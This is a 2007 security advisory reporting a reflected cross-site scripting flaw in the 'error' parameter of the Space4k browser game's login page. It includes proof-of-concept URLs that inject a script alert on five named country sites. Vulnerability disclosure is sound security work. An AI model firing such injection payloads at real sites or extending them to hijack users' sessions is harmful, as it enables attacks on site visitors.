space4k-xss.txt

`Application: Space4k  
Web Site: http://www.space4k.[pl|fr|com|de|it]  
Bug: XSS (Cross site Scripting)  
Discoverer: Florian Stinglmayr  
Date: 2007-06-07  
----------------------------------------------------------------------  
  
Description:  
============  
Space4K is a massive multiplayer online game game which can be played   
via the browser. Space4k has several divisions for different countries,   
e.g. .de for German speaking users, .com for English speaking countries   
and so forth. Space4k is being developed by GameForge AG.  
  
Flaw:  
=====  
The login.php has a GET variable named "error" which is used to display   
a string to the user in case of an error, e.g. "Username wrong.". This   
variable is being send to the user without proper sanitizing. A   
malicious user is able to include arbitrary HTML/Javascript by using   
this variable.  
  
POC:  
====  
http://space4k.com/space/login.php?error=%3Cscript%3Ealert(23);%3C/script%3E  
http://space4k.de/space/login.php?error=%3Cscript%3Ealert(23);%3C/script%3E  
http://space4k.fr/space/login.php?error=%3Cscript%3Ealert(23);%3C/script%3E  
http://space4k.it/space/login.php?error=%3Cscript%3Ealert(23);%3C/script%3E  
http://space4k.pl/space/login.php?error=%3Cscript%3Ealert(23);%3C/script%3E  
  
Vulnerable Sites:  
=================  
http://www.space4k.de  
http://www.space4k.com  
http://www.space4k.fr  
http://www.space4k.it  
http://www.space4k.pl  
  
  
Regards,  
Florian Stinglmayr  
  
`